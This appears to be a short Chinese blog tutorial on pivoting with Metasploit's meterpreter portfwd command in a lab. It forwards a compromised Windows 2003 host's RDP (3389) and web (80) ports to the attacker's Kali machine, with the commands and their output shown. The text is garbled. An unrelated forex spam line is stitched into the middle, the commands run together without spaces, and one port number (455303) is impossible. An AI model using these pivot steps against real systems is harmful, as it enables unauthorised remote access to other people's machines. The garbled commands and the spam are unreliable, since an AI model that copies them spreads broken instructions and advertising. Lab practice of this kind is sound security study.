Portfwd是一款强大的端口转发工具,支持TCP,UDP,支持IPV4--IPV6的转换转发。并且内置于meterpreter。其中exe单版本源码如下:

https://github.com/rssnsj/portfwd

复现过程

攻击机:192.168.1.5 Debian(Kali)

靶 机:192.168.1.4 Windows7

192.168.1.119 Windows 2003


Sessions -l查看所有msf的连接,看到一条连接到windows 03通信,是从192.168.1.1:455303到192.168.1.119:53

session -l 查看会话

靶机IP为:192.168.1.119---windows 2003---x64

function(){ //外汇跟单www.gendan5.com

需要转发端口为:80,3389

选择连接中的1号,就一条所以就只能选这个了

续上图

Portfwd -h查看用法

攻击执行

1meterpreter>portfwdadd‐l33389‐r192.168.1.119‐p3389

2[*]LocalTCPrelay created: :33389<‐>192.168.1.119:3389

3meterpreter>portfwdadd‐l30080‐r192.168.1.119‐p80

4[*]LocalTCPrelay created: :30080<‐>192.168.1.119:80

5meterpreter>portfwd

6Index LocalRemoteDirection

71 0.0.0.0:33389 192.168.1.119:3389Forward

82 0.0.0.0:30080 192.168.1.119:80Forward

92total active port forwards.

成功